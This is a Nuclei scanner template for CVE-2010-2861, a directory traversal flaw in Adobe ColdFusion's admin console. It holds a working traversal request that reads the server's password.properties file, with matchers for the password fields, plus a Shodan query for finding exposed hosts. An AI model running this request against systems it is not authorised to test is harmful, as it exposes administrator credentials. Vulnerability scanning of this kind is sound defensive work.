nuclei-templates/http/cves/2010/CVE-2010-2861.yaml

49 lines
1.9 KiB
YAML

id: CVE-2010-2861
info:
name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
author: pikpikcu
severity: high
description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
- http://www.adobe.com/support/security/bulletins/apsb10-18.html
- http://securityreason.com/securityalert/8148
- http://securityreason.com/securityalert/8137
- http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-2861
cwe-id: CWE-22
epss-score: 0.9718
epss-percentile: 0.99765
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi
http:
- method: GET
path:
- "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "rdspassword="
- "encrypted="
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100c55a6be891ad59cce4c9f89af898a47ce2598bb15ae65ae328c084683daf1c6a022100d4c0bb865e48327742bb0cbe6e7b2c5d0e8e0515069f891c074d1efcb994d220:922c64590222798bb761d5b6d8e72950